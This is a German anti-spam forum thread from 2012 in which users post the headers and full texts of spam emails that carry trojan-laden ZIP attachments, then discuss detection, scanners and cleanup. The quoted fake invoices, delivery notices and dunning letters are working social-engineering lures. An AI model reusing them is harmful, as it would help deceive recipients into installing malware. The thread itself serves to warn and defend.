Received-SPF: pass (mxbap1: domain of aecom.yu.edu designates 129.98.1.51 as permitted sender) client-ip=129.98.1.51; envelope-from=svalderr [at] aecom.yu.edu; helo=mx1.aecom.yu.edu;
Received: from mx1.aecom.yu.edu (mx1.aecom.yu.edu [129.98.1.51])
by mx.kundenserver.de (node=mxbap1) with ESMTP (Nemesis)
ID: [ID filtered]
Received: from draco.aecom.yu.edu (draco.aecom.yu.edu [129.98.1.160])
by mx1.aecom.yu.edu (Postfix) with ESMTP ID: [ID filtered]
for <§§§§§§§§§§§@§§§§§§.de>; Fri, 18 May 2012 xx:xx:xx -0400 (EDT)
X-AuditID: [ID filtered]
Received: from smtp2.aecom.yu.edu (smtp2.aecom.yu.edu [129.98.1.62])
by draco.aecom.yu.edu (Symantec Mail Security) with ESMTP ID: [ID filtered]
for <§§§§§§§§§§§@§§§§§§.de>; Fri, 18 May 2012 xx:xx:xx -0400 (EDT)
Received: from server.KAMINASSOCIATES.LOCAL (adsl-074-165-000-251.sip.asm.bellsouth.net [74.165.0.251])
(using TLSv1 with cipher RC4-MD5 (128/128 bits))
(No client certificate requested)
by smtp2.aecom.yu.edu (Postfix) with ESMTP ID: [ID filtered]
for <§§§§§§§§§§§@§§§§§§.de>; Fri, 18 May 2012 xx:xx:xx -0400 (EDT)
MIME-Version: 1.0
Date: Fri, 18 May 2012 xx:xx:xx -0400
X-Priority: 3 (Normal)
X-Mailer: Apple Mail (2.552)
Subject: Re: Registrierung Neuer Premiummitgliedschaft ID: [ID filtered]
From: svalderr [at] aecom.yu.edu
To: §§§§§§§§§§§@§§§§§§.de
Content-Type: multipart/mixed;
boundary="-----_chilkat_10b_ceb4_6b56bc0a.6864bc79_.MIX"
Message-ID: [ID filtered]
X-Brightmail-Tracker: AAAAAA==
X-UI-Loop: V01:285lY/X20jY=:RVsTsqukg0YURt5ziWFYjiQwVBoaNYUrD1vHL2TWyPk=
Envelope-To: §§§§§§§§§§§@§§§§§§.de
X-Antivirus: avast! (VPS 120517-1, 17.05.2012), Inbound message
X-Antivirus-Status: Clean

This is a multi-part message in MIME format.



[Zweites Vollzitat des Mailtextes vom Moderator entfernt]
-------_chilkat_10b_ceb4_6b56bc0a.6864bc79_.MIX
Content-Type: application/zip;
name="Mitgliedschaft.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Mitgliedschaft.zip"

Definitiv Virus, oder genauer gesagt Trojaner. Über die Masche gibt es bereits ein Thema, an das ich Deinen Beitrag gleich antackere.

Läuft bei Dir Windows? Wenn ja: Bitte trenne Deinen Computer umgehend vom Internet und prüfe Dein Betriebssystem auf Schädlinge. Die können sich auch einnisten, wenn man nur die ZIP-Datei öffnet. Ansonsten kannst Du alles Wichtige weiter oben in diesem Thema nachlesen.

Schönen Gruß
Mittwoch

Ja, ich hab Vista.
Der Virenscanner bemängelt auch den inhalt (Mitgliedschaft Mai 2012.pif) nicht...
Jetzt mach ich noch mit Hijackthis...

Gruß
Wolfgang

Ja, die feuern derzeit aus allen Rohren:
Received: from gateway03.websitewelcome.com (EHLO gateway03.websitewelcome.com) [67.18.34.23]
by mx0.gmx.net (mx059) with SMTP; 18 May 2012 xx:xx:xx +0200
Received: by gateway03.websitewelcome.com (Postfix, from userID: [ID filtered]
ID: [ID filtered]
Received: from gator717.hostgator.com (gator717.hostgator.com [174.132.170.98])
by gateway03.websitewelcome.com (Postfix) with ESMTP ID: [ID filtered]
for <x>; Fri, 18 May 2012 xx:xx:xx -0500 (CDT)
Received: from [69.21.94.154] (port=28263 helo=SERVER.smallbusiness.local)
by gator717.hostgator.com with esmtpsa (TLSv1:RC4-MD5:128)
(Exim 4.69)
(envelope-from <jeremy [at] make-penis-bigger-exercises.com>)
ID: [ID filtered]
Die Absende-IP ist derzeit in 5 Blocklisten enthalten:

cblless.anti-spam.org.cn (127.0.8.5)
cblplus.anti-spam.org.cn (127.0.8.6)
bl.nszones.com (127.0.0.2)
list.quorum.to (127.0.0.2)
Project Honeypot (127.73.13.1)

@ truelife

Vielen Dank, truelife, ich habe mir die Downloadseite angschaut, die Du vorgeschlagen hast, aber bei meinen Kenntnissen habe ich da großes Bedenken, daß ich bei der Programmausführung vieles falsch machen könnte, es sind auch so viele Fachausdrücke für mich drin, sorry.
Ich hatte mal meinen Rechner mit dem Programm "spybot -search und destroy" durchsuchen lassen, der fand zwei Cookies bei den Internetbrowsern "Explorer und Chrom" - die habe ich gelöscht. Danach lief er im grünen Bereich. Ob diese Atkion ausgereicht hat?? Was meinst Du?
Vielen Dank für die Mühe,
Katzina

Spybot S&D reicht net aus, die Anleitung von Hijackthis ist schon sehr verständlich und falsch machen kann man da wenig. Du kannst Dir von den Moderatoren bei protecus.de helfen lassen, melde Dich im Forum da an und gehe mit den Usern und Moderatoren die Anleitung durch. Ich spreche da aus eigenen Erfahrungen und Du kannst auch Deinen Rechner von einem Online-Scanner auf Viren und Malware prüfen lassen. Viele der grossen Hersteller haben auf ihren Websites Online-Scanner.

lG Gaia

Der Hijackthis hat mir keine weitern Erkenntnisse gebracht zu dem Thema, offenbar bin ich von einer Infektion verschont geblieben.
Interessieren tät mich, was das für ein Virus / Trojaner ist und was der macht. Den Anhang hab ich noch hier, wem könnte ich das zur Analyse schicken?

LG
Wolfgang

Interessieren tät mich, was das für ein Virus / Trojaner ist und was der macht. Den Anhang hab ich noch hier, wem könnte ich das zur Analyse schicken?
Ich könnte das nicht besser als Wikipedia zusammenfassen, daher verlinke ich einfach dorthin:
http://de.wikipedia.org/wiki/Computervirus
http://de.wikipedia.org/wiki/Computerwurm
http://de.wikipedia.org/wiki/Trojanisches_Pferd_(Computerprogramm) (http://de.wikipedia.org/wiki/Trojanisches_Pferd_%28Computerprogramm%29)
Bei der hier diskutierten Masche geht es vermutlich darum, neue Rechner für ein sog. Botnetz zu infizieren. Was ein Botnetz ist, kannst Du im Antispam-Wiki nachlesen, wenn Du eben gesetzten dem Link folgst. Ein Rechner, der mittels Trojaner infiziert wurde, heißt im Netzjargon Zombie.

Du kannst Dateien, bei denen Du Dir nicht sicher bist, ob sie sicher sind, neben einem lokalen Virenscanner auch einem Online-Virenscanner zu fressen geben. Letztere werden häufig von großen Herstellern von Antivirensoftware angeboten. Dieses Angebot hat für die Hersteller den Nutzen, sehr zeitnah an neue Viren, Würmer oder Trojaner zu kommen, die bislang noch unentdeckt waren. Ich persönlich nutze VirusTotal (https://www.virustotal.com/de/) sehr gerne, es gibt aber auch noch andere Anbieter, die man schnell findet, wenn man "Online Virenscanner" in die Suchmaschine des eigenen Vertrauens eingibt.

Schönen Gruß
Mittwoch

Seit gestern wird der Trojaner von AVAST erkant. Es handelt sich um einen
Win32:Karagany-HB (Troj)
Downloader...
Auch Virustotal (finde ich auch ausgezeichnet) konnte diesen identifizieren.

Vielen Dank für euere Beiträge.

Gruß
Wolfgang

Heute ist diese Art Mail schon dreimal hier aufgeschlagen...

Guten Abend Leute,

ich hab auch diese mails bekommen sogar 2-mal. Jetz hätte ich da aber noch eine Frage ich war so blöd und hab auf diese Exe bzw Zip datei drauf geklickt jedoch hat mein kaspersky mir den zugriff verweigert. Das bedeutet ja dann das mein Computer weiterhin sicher ist ? Oder täusch ich mich da jetz, weil ich konnts ja nicht öffnen und Das Viren programm hat es gleich auf isolation gesetzt ? Weil ich und meine Eltern eben das Online Banking benutzen, nicht das jetz diese Leute da an unsere Bankddaten kommen können. Ich hoffe ihr könnt mir helfen.

LG

Jetz hätte ich da aber noch eine Frage ich war so blöd und hab auf diese Exe bzw Zip datei drauf geklickt jedoch hat mein kaspersky mir den zugriff verweigert. Das bedeutet ja dann das mein Computer weiterhin sicher ist?
Kaspersky ist bekannt dafür, Computerschädlinge relativ schnell nach ihrem ersten auftreten identifizieren zu können. Wenn Dein Virenscanner mehrmals täglich die jeweiligen Updates lädt, kannst Du mit hoher Wahrscheinlichkeit davon ausgehen, dass Du vor Schlimmerem bewahrt wurdest. Hundertprozentige Gewissheit kann man aber nur dann haben, wenn man nicht auf Dateianhänge aus unbekannten Quellen klickt. Und wenn man neben der Virensoftware auch das Betriebssystem mit den aktuellsten Patches versorgt.

Der beste Schutz vor Computerschädlingen sitzt vor dem Rechner. Wenn man mit gesundem, weitgehendem Misstrauen surft, sollte eine Rechnung einer Firma, die man nicht kennt und bei der man folglich auch noch nie etwas bestellt hat, schon stutzig machen. Wenn ich Dir auf der Straße einen Briefumschlag in die Hand drücke und dann sage: "Da ist eine Rechnung drin, nun zahl gefälligst." – Würdest Du den Umschlag öffnen? Eine kurze Recherche mit einer Suchmaschine hilft bei solchen Angriffen ganz gut, denn mittlerweile gibt es diverse aktuelle Warnungen im Netz.

Schönen Gruß
Mittwoch

Mittlerweile kommen die Dinger mit doppelt gezippte, verschlüsselten Attachments daher. Allerdings ist der Anhang irgendwie falsch gepackt und ich komm nicht an den Inhalt ran.


Return-Path: <lrl [at] liquidcompass.net>
Received: from unknown (HELO inbound.appriver.com) (207.97.230.34)
by 0 with ESMTPS (DES-CBC3-SHA encrypted); 22 May 2012 03:XX:XX -0000
Received-SPF: none (0: domain at liquidcompass.net does not designate permitted sender hosts)
Received: from [71.249.217.77] (HELO server)
by inbound.appriver.com (CommuniGate Pro SMTP 5.4.4)
with ESMTP ID: [ID filtered]
MIME-Version: 1.0
Date: Mon, 21 May 2012 23:XX:XX -0400
X-Priority: 3 (Normal)
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
Subject: =?iso-8859-1?Q?deine_Lieferbest=E4tigung_1234567890_?=
From: lrl [at] liquidcompass.net
To: me [at] work
Content-Type: multipart/mixed;
boundary="-----_X.MIX"
Message-ID: [ID filtered]



Guten Tag,

unser Versandpartner hat Ihre Bestellung mit der Bestell Nummer 1234567890 zum Versand an Hermes Versand übergeben.

In der beigefügten Datei befindet sich die Abrechnung und die Zustelladresse als Doc Datei.
Die Rechnungsbestätigung wurde laut dem §§ 6e 2f um Ihre Privatsphäre zu schützen mit Ihrem persönlichen Kennwort verschlüsselt.

Ihr Passwort lautet# haus

Sie können die Abrechnung jederzeit selbständig über den online Shop ansehen.

Diese Angaben werden gebraucht:

- Email und die Bestellnummer bzw.
- die Auftrags-Nummer und die Serien-Nummer

Auftragsnummer: 1234567890
Geräte Serien-Nr.: 1234567890
Summe 581,64 EU

Die Buchung erfolgt in Die einigen Tagen von Ihrem Bank-Konto.

Ihr Auftrag ist hiermit fertig.

Mit besten Grüßen

Ihr Kundendienst

____________________________________
Daoku-Technik Online-Handel mit Sitz in Düsseldorf

Vorstand: J* B*, A* S*
Aufsichtsratsvorsitzender: E* G*
Amtsgericht: Potsdam 17870
_________

Moin moin zusammen,

bei mir haben die auch grade versucht einen Virus o.ä. einzuschleusen.

Guten Morgen,

unser Postzentrum hat Ihre Bestellung mit der Bestell Nr. 96177005684 zur Lieferung an Die UPS übergeben.

Im Anhangsordner befindet sich die Rechnung und die Lieferadresse als Druck-Datei.
Die Rechnungsbestätigung wurde laut dem § 7e 3a aus Sicherheitsgründen mit einem unikaten Pin verschlüsselt.

Das Passwort----> haus


Sie dürfen die Abrechnung jederzeit selbst über online Webseite ansehen.

Diese Angaben werden benötigt:

- Ihre Email-Adresse und die Bestellnummer bzw.
- die Vertrags-Nr. und die Geräte-ID

Artikelnummer: 25794460725
Geräte Serien-Nr.: 49841566749
Buchungssumme 251,30 euro

Die Abrechnung erfolgt in Die einigen Tagen von Ihrem Onlinebank-Konto.

Ihr Auftrag ist hiermit fertiggestellt.

Mit besten Grüßen

Ihr Kundendienst

__________________________________
Peeto Elektronik Online-Shop mit Sitz in Hannover

Vorstand: Maria Haas, Karin Müller
Aufsichtsratsvorsitzender: Peter Wagner
Gesellschaftssitz: München 97921
_________________



Der Anhang lautet: 2012.zip und hat 37,0KB.
Return-Path: <SRS0=IvTJjF=DZ=merchantaccountetc.com=rick [at] eigbox.net>
Received: from bosmailout12.eigbox.net (bosmailout12.eigbox.net [66.96.190.12])
by mtain-md04.r1000.mx.aol.com (Internet Inbound) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Mon, 21 May 2012 xx:xx:xx -0400 (EDT)
Received: from bosmailscan05.eigbox.net ([10.20.15.5])
by bosmailout12.eigbox.net with esmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Mon, 21 May 2012 xx:xx:xx -0400
Received: from bosimpout01.eigbox.net ([10.20.55.1])
by bosmailscan05.eigbox.net with esmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Mon, 21 May 2012 xx:xx:xx -0400
Received: from bosauthsmtp14.eigbox.net ([10.20.18.14])
by bosimpout01.eigbox.net with NO UCE
ID: [ID filtered]
X-Authority-Analysis: v=2.0 cv=HfGjuF48 c=1 sm=1
a=JGEhlICRMeEpi/nAnxFwFQ==:17 a=ITbhAUetdq8A:10 a=cRiQlvaJGx8A:10
a=DqVHwcQmQ6QA:10 a=v4YTmEDuAAAA:8 a=NimMPD_XAAAA:8 a=QPcu4mC3AAAA:8
a=3oc9M9_CAAAA:8 a=baOGKXgQ6KSF8H3KA6wA:9 a=wPNLvfGTeEIA:10
a=nHFLwIULGSSbF11hAJoA:9 a=IKIoO-ieCDEA:10 a=AnsiuLKgxXFeB68GILQVjQ==:117
X-EN-OrigOutIP: 10.20.18.14
X-EN-IMPSID: [ID filtered]
Received: from bre75-1-78-192-242-228.fbxo.proxad.net ([78.192.242.228] helo=serv-ffp1.ffp.lan)
by bosauthsmtp14.eigbox.net with esmtpsa (TLSv1:RC4-MD5:128)
(Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Mon, 21 May 2012 xx:xx:xx -0400
MIME-Version: 1.0
Date: Tue, 22 May 2012 xx:xx:xx +0200
X-Priority: 3 (Normal)
X-Mailer: Sylpheed version 0.7.6 (GTK+ 1.2.10;
i686-pc-tommie-gnu)
Subject: Artikelerwerb 7322318062
From: rick [at] merchantaccountetc.com
To: poor [at] spamvictim.tld
Content-Type: multipart/mixed;
boundary="-----_chilkat_5c9_ca15_e7ec9850.62d08391_.MIX"
Message-ID: [ID filtered]
X-EN-UserInfo: 117fac11fc4d8add5f506d21ba2ee0d4:68e300a672dc7ffa4cfe004fc759a8fb
X-EN-AuthUser: rick [at] merchantaccountetc.com
Sender: rick [at] merchantaccountetc.com
X-EN-OrigIP: 78.192.242.228
X-EN-OrigHost: bre75-1-78-192-242-228.fbxo.proxad.net
X-Originating-IP: 78.192.242.228
x-aol-global-disposition: S
X-AOL-VSS-INFO: 5400.1158/80909
X-AOL-VSS-CODE: scan_error
X-AOL-SCOLL-SCORE: 0:2:297912928:93952408
X-AOL-SCOLL-URL_COUNT: 0
X-AOL-REROUTE: YES
x-aol-sID: [ID filtered]
X-AOL-IP: 66.96.190.12
X-AOL-SPF: domain : eigbox.net SPF : pass
X-Antivirus: avast! (VPS 120521-1, 21.05.2012), Inbound message
X-Antivirus-Status: Clean

Gruß Frechdachs

Vielen Dank für die Info, das hat mir echt sehr weitergeholfen, hab aber auch nochmal zu Sicherheit den ganzen Laptop überprüfen lassen.

Gut das ich Kaspersky hab :D


LG Schönen Abend noch

Hier gleich aus aktellem Anlaß(neue befallene Kiste auf dem Tisch) neue Infos zum Schädling(neue Version)
- Entfernung immernoch genauso problemlos
- es werden eigene Dateien, sämtliche Bilddateien(also auch systemeigene), Mailfiles(Thunderbird uns Outlook) und auch Anwendungen verschlüsselt
- Verschlüsselung scheint bei jedem File anders zu sein - die bisher vorhandenen Tools zur Entschlüsselung funktionieren nicht
- Dateiname wird rein zufällig generiert und wird auch ab und an nicht geändert
- Extension ist immer weg

bei diesem Umfang der Verschlüsselung ist nur noch sauber Neuaufsetzen der einzig sinnvoll gangbare Weg.

bei diesem Umfang der Verschlüsselung ist nur noch sauber Neuaufsetzen der einzig sinnvoll gangbare Weg.

Wohl dem, der über ein halbwegs aktuelles Image auf externer Platte verfügt.

Sie sind jetzt für die nächsten 9 Monate Premiumkunde und dürfen in vollen Umfang die Premiummöglichkeiten nutzen.
Entnehmen Sie die Vertragseinzeilheiten bitte der beigefügter Datei, dort finden Sie auch die Bestelldetails und Stardienstvorteile. Falls Sie die Starmitgliedschaft nicht mehr wollen, mailen Sie die Stornierung, mit der in dem zugefügten Ordner, beigelegten Stornierungserklärung.

Die versuchen ja mit immer tolleren Tricks die Leute dazu zu bewegen den Anhang zu öffnen

Dabei schreckt schon die gruselige Rechtschreibung ab und sollte jeden hellhörig werden lassen den Anhang net zu öffnen.
Ausserdem das eigene Virenprogramm immer aktuell halten, so kann auch der Zugriff wie hier im Thread beschrieben, verweigert werden und schützt vor bösen Überraschungen.
Am besten fährt man, wenn man unbekannte e-Mails ungeöffnet löscht. Einen besseren Ratschlag gibt es net.

Die versuchen weiter den Druck zu erhöhen um ein öffnen zu provozieren


Sehr geehrte Damen und Herren,

in Bezug auf unsere Rechnung Nr.: 99172601 und unsere 1. sowie auch unsere 2. Mahnung mussten wir heute feststellen, dass Ihre Zahlung bei uns noch immer nicht beglichen ist. Dies bedeutet einen einseitigen Vertragsbruch Ihrerseits. Nach geltendem Recht könnten wir die offene Forderung bereits jetzt bei Gericht anmelden. Wir geben Ihnen jedoch trotzdem noch eine letzte Möglichkeit, Ihre vertragliche Verpflichtung zu erfüllen, indem Sie unverzüglich die ausstehende Summe in Höhe von 724.00 EURO an uns zur Zahlung bringen. Möglicherweise konnten wir Ihre Zahlung nicht zuordnen, weil z.B. der Verwendungszweck nicht korrekt angegeben wurde.

Die Bestelleinzelheiten und die Rechnung können Sie im zugefügtem Zip Ordner ansehen.

Nach geltendem Recht sind wir befugt, die anfallenden Kosten geltend zu machen. Alle bereits angefallenen und noch entstehenden Kosten (Mahnkosten, Rechtsanwalts- und Gerichtskosten) gehen zu Ihren Lasten.

Vermeiden Sie unnötigen Ärger und weitere Kosten und erfüllen Sie den mit uns abgeschlossenen Vertrag.



Neopu Elektro Aktiengesellschaft mit Sitz in Hamburg

Vorstand: A. S., M. P.
Aufsichtsratsvorsitzender: M. M.
Amtsgericht: Essen 02025


Return-Path: <john.milnes [at] btconnect.com>
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on

X-Spam-Level:
X-Spam-Status: No, score=-2.6 required=5.0 tests=BAYES_00 autolearn=ham
version=3.2.5
X-Original-To:
Delivered-To:
Received: from mail.btconnect.com (c2bthomr13.btconnect.com [213.123.20.131])
by (Postfix) with ESMTP ID: [ID filtered]
for <>; Mon, 28 May 2012 xx:xx:xx +0200 (CEST)
Received: from static-71-103-242-141.lsanca.dsl-w.verizon.net (EHLO dj-famous.dj.int) ([71.103.242.141])
by c2bthomr13.btconnect.com
with ESMTP ID: [ID filtered]
Mon, 28 May 2012 xx:xx:xx +0100 (BST)
MIME-Version: 1.0
Date: Mon, 28 May 2012 xx:xx:xx -0700
X-Priority: 3 (Normal)
X-Mailer: Evolution/1.0-5mdk
Subject: Zahlungsaufforderung nach Vertragsbruch 23.05.2012
From: john.milnes [at] btconnect.com
To:
Content-Type: multipart/mixed;
boundary="-----_chilkat_3b8_0ace_e68daf51.053aa0ad_.MIX"
Message-ID: [ID filtered]
X-Mirapoint-IP-Reputation: reputation=Neutral-1,
source=Queried,
refid=tid=0001.0A0B0301.4FC3C133.0087,
actions=tag
X-Junkmail-Premium-Raw: score=8/50,
refid=2.7.2:2012.5.28.173315:17:8.129,
ip=71.103.242.141,
rules=__MIME_VERSION,
DATE_TZ_NA,
__HAS_X_PRIORITY,
__HAS_X_MAILER,
NO_REAL_NAME,
__TO_MALFORMED_2,
__TO_NO_NAME,
__CT,
__CTYPE_HAS_BOUNDARY,
__CTYPE_MULTIPART,
__CTYPE_MULTIPART_MIXED,
__HAS_MSGID,
__SANE_MSGID,
ZIP_ATTACHED,
__ANY_URI,
__URI_NO_MAILTO,
__URI_NO_WWW,
__URI_NO_PATH,
SUPERLONG_LINE,
BODY_SIZE_10000_PLUS,
BODYTEXTP_SIZE_3000_LESS,
__RDNS_BROADBAND_3,
__RDNS_STATIC_1,
RDNS_GENERIC_POOLED,
HTML_00_01,
HTML_00_10,
RDNS_STATIC,
RDNS_BROADBAND,
RDNS_SUSP_SPECIFIC,
RDNS_SUSP
X-Junkmail-Status: score=10/50, host=c2bthomr13.btconnect.com
X-Junkmail-Signature-Raw: score=unknown,
refid=str=0001.0A0B0208.4FC3C45F.015F,ss=1,re=0.000,vtr=str,vl=0,fgs=0,
ip=71.103.242.141,
so=2011-07-25 xx:xx:xx,
dmn=2011-05-27 xx:xx:xx,
mode=multiengine
X-Junkmail-IWF: false


Anhang ist doppelt gepackt: inkasso.zip enthält abmahnung.zip, diese wiederum eine 52kb große "Verknüpfung mit einer Anwendung für MS-Dos" mit Namen "Letzte Abmahnung.pif"

NACHTRAG: Scheint wieder ne neue Version zu sein bei Virustotal sind 29 von 40 noch völlig blind - unter den Sehenden ist keiner der gebräuchlichen Verdächtigen

Hallo Thomas1611 habe fast die selbe Nachricht wie Sie bekommen, ebenfalls ähnlich formuliert, da würde es auch nahe liegen, dass beide Mails vom selben Absender stammen.



x-store-info:sbevkl2QZR7OXo7WID5ZcVBK1Phj2jX/
Authentication-Results: hotmail.com; sender-id=none (sender IP is 208.76.80.175) header.from=jdbradshaw [at] otiso.com; dkim=none header.d=otiso.com; x-hmca=none
X-SID-PRA: jdbradshaw [at] otiso.com
X-DKIM-Result: None
X-Message-Status: n:0:n
X-SID-Result: None
X-AUTH-Result: NONE
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtHRD0xO1NDTD0w
X-Message-Info: NhFq/7gR1vRNrwoFQFkNLLppSlJ7E6Hu4JZPZ1cxT06AJVFmwv8hAAIv+PqRiJkVBklV0LlPp565TwcipVuJ+ 48knKd78tiCIdIhoSWzuSKJIAGqxsNu0taxuBz9soh5Pn2lprghMx2XWqBnFzc4kg==
Received: from xerxes.tchmachines.com ([208.76.80.175]) by SNT0-MC1-F24.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Fri, 25 May 2012 xx:xx:xx -0700
Received: from [194.46.61.178] (port=28022 helo=sbserver.sbs.local)
by xerxes.tchmachines.com with esmtpsa (TLSv1:RC4-MD5:128)
(Exim 4.77)
(envelope-from <jdbradshaw [at] otiso.com>)
ID: [ID filtered]
for ..... [at] msn.com; Fri, 25 May 2012 xx:xx:xx -0400
MIME-Version: 1.0
Date: Fri, 25 May 2012 xx:xx:xx +0100
X-Priority: 3 (Normal)
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
Subject: Zahlungsaufforderung nach Vertragsbruch 25.05.2012
From: jdbradshaw [at] otiso.com
To: .... [at] msn.com
Content-Type: multipart/mixed;
boundary="-----_chilkat_743_b139_6afd88f7.90e075a3_.MIX"
Message-ID: [ID filtered]
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - xerxes.tchmachines.com
X-AntiAbuse: Original Domain - msn.com
X-AntiAbuse: Originator/Caller UID/GID: [UID filtered]
X-AntiAbuse: Sender Address Domain - otiso.com
Return-Path: jdbradshaw [at] otiso.com
X-OriginalArrivalTime: 25 May 2012 xx:xx:xx.0788 (UTC) FILETIME=[77833BC0:01CD3AA0]

This is a multi-part message in MIME format.

-------_chilkat_743_b139_6afd88f7.90e075a3_.MIX
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

-------_chilkat_743_b139_6afd88f7.90e075a3_.MIX
Content-Type: application/zip;
name="Mahnung.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Mahnung.zip"


Guten Tag,

in Bezug auf unsere Rechnung Nr.: 97394586 und unsere 1. sowie auch unsere 2. Mahnung mussten wir heute feststellen, dass Ihre Zahlung bei uns noch immer nicht ausgeglichen ist. Dies bedeutet einen einseitigen Vertragsbruch Ihrerseits. Nach geltendem Recht könnten wir die offene Forderung bereits jetzt bei Gericht anmelden. Wir geben Ihnen jedoch trotzdem noch eine letzte Möglichkeit, Ihre vertragliche Verpflichtung zu erfüllen, indem Sie unverzüglich die ausstehende Summe in Höhe von 942.00 EURO an uns zur Zahlung bringen.

Die Rechnung und die Bestelleinzelheiten finden Sie im Zusatzordner

Nach geltendem Recht sind wir befugt, die anfallenden Kosten geltend zu machen. Alle bereits angefallenen und noch entstehenden Kosten (Mahnkosten, Rechtsanwalts- und Gerichtskosten) gehen zu Ihren Lasten.

Vermeiden Sie unnötigen Ärger und weitere Kosten und erfüllen Sie den mit uns abgeschlossenen Vertrag!



Raese-Media Aktiengesellschaft mit Sitz in Hannover

Vorstand: J. L., W. P.
Aufsichtsratsvorsitzender: D. L.
Amtsgericht: Keiserslauter 11637

Der Anhang war auch wieder eine Zip-Datei mit: Mahnung.zip (38,1 KB)
wurde aber durch mein Virenprogramm (Avast) entdeckt: Mahnung.zip: In dieser Anlage wurde ein Virus entdeckt, der nicht beseitigt werden konnte. Die infizierte Anlage wurde aus Sicherheitsgründen gelöscht.

Diese Firma Raese-Media gibt es auch nicht.

Das Ding kommt momentan mit allen möglichen Phantasiefirmennamen, aber immer mit dem gleichen Muster.
Komischerweise war dieser Satz

Die Rechnung und die Bestelleinzelheiten finden Sie im Zusatzordner
in allen praktisch gleichlautend enthalten

Wie ist das eigentlich, sollte man solche Mails beim Bmi melden oder bringt das nichst?

sollte man solche Mails beim Bmi melden oder bringt das nichst?
Was bitte hat das Bundesministerium des Innern damit zu tun?

Es ist sinnvoll, die Warnungen vor diesen Mails möglichst breit im Internet zu streuen, z.B. in verschiedenen Foren oder über soziale Netzwerke (aber bitte dabei nicht selber spammen). Es ist ebenso sinnvoll, die Anhänge bei den großen Antiviruslaboren einzuwerfen, wenn diese vom eigenen Virenscanner nicht erkannt werden. Und es ist sinnvoll, diese Mails auch bei den großen (Free-)Mailprovidern als Spam zu kennzeichnen, damit die möglichst bald schon serverseitig entsorgt werden.

Es ist aber nicht sinnvoll, irgendwelchen Behörden irgendwas zu melden. Die Hinterleute dieser Spamruns sind nicht so dingfest zu machen, dass eine Verfolgung durch Behörden sinnvoll wäre. Und alle weiteren Gegenmaßnahmen sollte man lieber Profis überlassen, die dann allerdings schon von sich aus tätig wären. Diese Art von Spammmails kommt aus Kreisen des organisierten Verbrechens, und solche Leute verstehen keinen Spaß, wenn man versucht, zurück zu schlagen.

Schönen Gruß in Richtung offtopic
Mittwoch

Bei mir als dritte - dreiste - Mahnung Return-Path: <asdasd45 [at] email.ee>
X-Original-To: ***@arcor.de
Received: from mail-in-10.arcor-online.net (mail-in-10.arcor-online.net [151.189.21.50])
by mail-in-07-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
for <***@arcor.de>; Tue, 29 May 2012 xx:xx:xx +0200 (CEST)
Received: from mail.email.ee (unknown [194.106.111.43])
by mx.arcor.de (Postfix) with ESMTPS ID: [ID filtered]
for <poor [at] spamvictim.tld>; Tue, 29 May 2012 xx:xx:xx +0200 (CEST)
X-DKIM: Sendmail DKIM Filter v2.8.2 mx.arcor.de 7FF4735C058
Received: from 074-050-140-109.plateautel.net ([74.50.140.109] helo=hbcfserver1.hamilton.local)
by mail.email.ee with esmtpa (Exim 4.69)
(envelope-from <poor [at] spamvictim.tld>)
ID: [ID filtered]
for ***@arcor.de; Tue, 29 May 2012 xx:xx:xx +0300
MIME-Version: 1.0
Date: Tue, 29 May 2012 xx:xx:xx -0600
X-Priority: 3 (Normal)
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Subject: Anwender *** dritte Zahlungsaufforderung 25.05.2012 Inkassobüro
From: asdasd45 [at] email.ee
To: "***" <***@arcor.de>
Content-Type: multipart/mixed;
boundary="-----_chilkat_3b7_a6a8_671bd779.2b4b1e1d_.MIX"
Message-ID: [ID filtered]
X-DCC-ARCOR-Metrics: mail-in-07-z2 1242; Body=1 Fuz1=1
X-Arcor-Antispam: SPF_NONE RECEIVED_FROM_UNKNOWN STRANGE_CHARSET
X-ArcorSpamBlocker: Spamcount: 6 Sensitivity: 13
Von: asdasd45 [at] email.ee
An: *** <***@arcor.de>
Datum/Uhrzeit: 29.05.2012 / 10:05(Empfang)
Nachrichtenart: E-Mail 41 KB Anlagen Beantwortet
Betreff: Anwender *** dritte Zahlungsaufforderung 25.05.2012 Inkassobüro
Benutzer Konto: ***.

Guten Morgen,

in Bezug auf unsere Rechnung Nr.: 62351715 für den Nutzer *** und unsere 1. sowie auch unsere 2. Mahnung mussten wir heute feststellen, dass Ihre Zahlung bei uns noch immer nicht gebucht wurde. Dies bedeutet einen einseitigen Vertragsbruch von Ihnen. Nach geltendem Recht könnten wir die offene Kosten bereits jetzt beim Rechtsanwalt fordern. Wir geben Ihnen jedoch noch eine letzte Chance, Ihre vertragliche Verpflichtung zu erfüllen, indem Sie innerhalb von 3 Tagen die ausstehende Rechnung in Höhe von 525.00 EURO an uns zur Zahlung bringen.

Die Dienste und die Bankdaten können Sie in beigefügtem Anhang sehen.

Vermeiden Sie unnötigen Ärger und weitere Kosten und erfüllen Sie den mit uns abgeschlossenen Vertrag.


Seohi-Dating-Online Ltd. mit Sitz in Potsdam

Geschäftsleiter: Walter Eder, Gerhard Eder
Aufsichtsratsvorsitzender: Andreas Schneider
Gesellschaftssitz: Augsburg

Anlagen Mahnbescheid.zip (41 KB) Es wurde eine alias Adresse von mir verwendet. Mit dazugehörigem Nick.

Der Mahnbescheid.zip enthält einen Trojaner: Win32/VBInject :skull:

IP: 194.106.111.43 Estonia | DNS BlackList results: IP.v4BL.org

3853

Auf gutefrage.net gibt es seit vorgestern massenweise Fragen zu solchen Mails von Flirt-Fever. In einer davon hieß es: "Gericht: Keiserslautern". DIE haben dazugelernt. Nur noch ein Fehler im Ortsnamen! :)

